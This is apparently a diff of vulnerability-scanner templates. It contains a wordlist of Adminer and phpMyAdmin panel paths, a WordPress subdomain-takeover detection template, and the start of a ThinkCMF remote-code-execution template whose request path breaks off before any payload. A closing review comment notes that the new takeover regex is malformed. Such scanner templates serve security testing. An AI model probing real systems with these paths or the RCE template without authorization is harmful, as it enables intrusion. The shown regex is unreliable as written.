+/editor-4.6.2-mysql-en.php +/editor-4.6.2-mysql-pl.php +/editor-4.6.2-mysql-sk.php +/editor-4.6.2-mysql.php +/editor-4.6.2-pl.php +/editor-4.6.2-sk.php +/editor-4.6.2.php +/editor-4.6.3-cs.php +/editor-4.6.3-de.php +/editor-4.6.3-en.php +/editor-4.6.3-mysql-cs.php +/editor-4.6.3-mysql-de.php +/editor-4.6.3-mysql-en.php +/editor-4.6.3-mysql-pl.php +/editor-4.6.3-mysql-sk.php +/editor-4.6.3-mysql.php +/editor-4.6.3-pl.php +/editor-4.6.3-sk.php +/editor-4.6.3.php +/editor-4.7.0-cs.php +/editor-4.7.0-de.php +/editor-4.7.0-en.php +/editor-4.7.0-mysql-cs.php +/editor-4.7.0-mysql-de.php +/editor-4.7.0-mysql-en.php +/editor-4.7.0-mysql-pl.php +/editor-4.7.0-mysql-sk.php +/editor-4.7.0-mysql.php +/editor-4.7.0-pl.php +/editor-4.7.0-sk.php +/editor-4.7.0.php +/editor-4.7.1-cs.php +/editor-4.7.1-de.php +/editor-4.7.1-en.php +/editor-4.7.1-mysql-cs.php +/editor-4.7.1-mysql-de.php +/editor-4.7.1-mysql-en.php +/editor-4.7.1-mysql-pl.php +/editor-4.7.1-mysql-sk.php +/editor-4.7.1-mysql.php +/editor-4.7.1-pl.php +/editor-4.7.1-sk.php +/editor-4.7.1.php +/editor-4.7.2-cs.php +/editor-4.7.2-de.php +/editor-4.7.2-en.php +/editor-4.7.2-mysql-cs.php +/editor-4.7.2-mysql-de.php +/editor-4.7.2-mysql-en.php +/editor-4.7.2-mysql-pl.php +/editor-4.7.2-mysql-sk.php +/editor-4.7.2-mysql.php +/editor-4.7.2-pl.php +/editor-4.7.2-sk.php +/editor-4.7.2.php +/editor-4.7.3-cs.php +/editor-4.7.3-de.php +/editor-4.7.3-en.php +/editor-4.7.3-mysql-cs.php +/editor-4.7.3-mysql-de.php +/editor-4.7.3-mysql-en.php +/editor-4.7.3-mysql-pl.php +/editor-4.7.3-mysql-sk.php +/editor-4.7.3-mysql.php +/editor-4.7.3-pl.php +/editor-4.7.3-sk.php +/editor-4.7.3.php +/editor-4.7.4-cs.php +/editor-4.7.4-de.php +/editor-4.7.4-en.php +/editor-4.7.4-mysql-cs.php +/editor-4.7.4-mysql-de.php +/editor-4.7.4-mysql-en.php +/editor-4.7.4-mysql-pl.php +/editor-4.7.4-mysql-sk.php +/editor-4.7.4-mysql.php +/editor-4.7.4-pl.php +/editor-4.7.4-sk.php +/editor-4.7.4.php +/editor-4.7.5-cs.php +/editor-4.7.5-de.php 
+/editor-4.7.5-en.php +/editor-4.7.5-mysql-cs.php +/editor-4.7.5-mysql-de.php +/editor-4.7.5-mysql-en.php +/editor-4.7.5-mysql-pl.php +/editor-4.7.5-mysql-sk.php +/editor-4.7.5-mysql.php +/editor-4.7.5-pl.php +/editor-4.7.5-sk.php +/editor-4.7.5.php +/editor-4.7.6-cs.php +/editor-4.7.6-de.php +/editor-4.7.6-en.php +/editor-4.7.6-mysql-cs.php +/editor-4.7.6-mysql-de.php +/editor-4.7.6-mysql-en.php +/editor-4.7.6-mysql-pl.php +/editor-4.7.6-mysql-sk.php +/editor-4.7.6-mysql.php +/editor-4.7.6-pl.php +/editor-4.7.6-sk.php +/editor-4.7.6.php +/editor-4.7.7-cs.php +/editor-4.7.7-de.php +/editor-4.7.7-en.php +/editor-4.7.7-mysql-cs.php +/editor-4.7.7-mysql-de.php +/editor-4.7.7-mysql-en.php +/editor-4.7.7-mysql-pl.php +/editor-4.7.7-mysql-sk.php +/editor-4.7.7-mysql.php +/editor-4.7.7-pl.php +/editor-4.7.7-sk.php +/editor-4.7.7.php +/editor-4.7.8-cs.php +/editor-4.7.8-de.php +/editor-4.7.8-en.php +/editor-4.7.8-mysql-cs.php +/editor-4.7.8-mysql-de.php +/editor-4.7.8-mysql-en.php +/editor-4.7.8-mysql-pl.php +/editor-4.7.8-mysql-sk.php +/editor-4.7.8-mysql.php +/editor-4.7.8-pl.php +/editor-4.7.8-sk.php +/editor-4.7.8.php +/editor-4.7.9-cs.php +/editor-4.7.9-de.php +/editor-4.7.9-en.php +/editor-4.7.9-mysql-cs.php +/editor-4.7.9-mysql-de.php +/editor-4.7.9-mysql-en.php +/editor-4.7.9-mysql-pl.php +/editor-4.7.9-mysql-sk.php +/editor-4.7.9-mysql.php +/editor-4.7.9-pl.php +/editor-4.7.9-sk.php +/editor-4.7.9.php +/editor-4.8.0-cs.php +/editor-4.8.0-de.php +/editor-4.8.0-en.php +/editor-4.8.0-mysql-cs.php +/editor-4.8.0-mysql-de.php +/editor-4.8.0-mysql-en.php +/editor-4.8.0-mysql-pl.php +/editor-4.8.0-mysql-sk.php +/editor-4.8.0-mysql.php +/editor-4.8.0-pl.php +/editor-4.8.0-sk.php +/editor-4.8.0.php +/editor-mysql.php +/editor.php +/editor/ +/mysql.php +/php/adminer.php +/phpmyadmin.php +/public/adminer.php +/sql.php +/tools/adminer.php +/web/adminer.php +/wp-content/plugins/adminer/adminer.php \ No newline at end of file 
diff --git a/takeovers/wordpress-takeover.yaml b/takeovers/wordpress-takeover.yaml index bd4783aaeb..34205346dd 100644 --- a/takeovers/wordpress-takeover.yaml +++ b/takeovers/wordpress-takeover.yaml @@ -1,10 +1,10 @@ id: wordpress-takeover info: - name: wordpress takeover detection - author: pdcommunity + name: WordPress takeover detection + author: pdcommunity & geeknik severity: high - tags: takeover + tags: takeover,wordpress reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: @@ -12,7 +12,13 @@ requests: path: - "{{BaseURL}}" + redirects: true + matchers-condition: and matchers: - type: word words: - - Do you want to register \ No newline at end of file + - 'Do you want to register' + + - type: regex + regex: + - "[a-zA-Z0-9][a-zA-Z0-9-_]*\\.)*[a-zA-Z0-9]*[a-zA-Z0-9-_]*[[a-zA-Z0-9].wordpress.com" diff --git a/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml b/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml new file mode 100644 index 0000000000..b35db666c5 --- /dev/null +++ b/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml @@ -0,0 +1,27 @@ +id: thinkcmf-arbitrary-code-execution + +info: + name: ThinkCMF Arbitrary code execution + author: pikpikcu + severity: high + reference: https://www.shuzhiduo.com/A/l1dygr36Je/ + tags: thinkcmf + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=
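Review bot: The new regex matcher `"[a-zA-Z0-9][a-zA-Z0-9-_]*\\.)*[a-zA-Z0-9]*[a-zA-Z0-9-_]*[[a-zA-Z0-9].wordpress.com"` has a closing `)` with no opening `(` and a doubled `[[`, so it should fail to compile and the template will not load, and the unescaped `.` before `wordpress` and `com` matches any character. A balanced, escaped form is `- "([a-zA-Z0-9][a-zA-Z0-9-_]*\\.)*[a-zA-Z0-9]*[a-zA-Z0-9-_]*[a-zA-Z0-9]\\.wordpress\\.com"`. With `matchers-condition: and` the regex is mandatory, so the broken pattern affects every use of this template. The `requests:` block this hunk edits begins in the previous hunk.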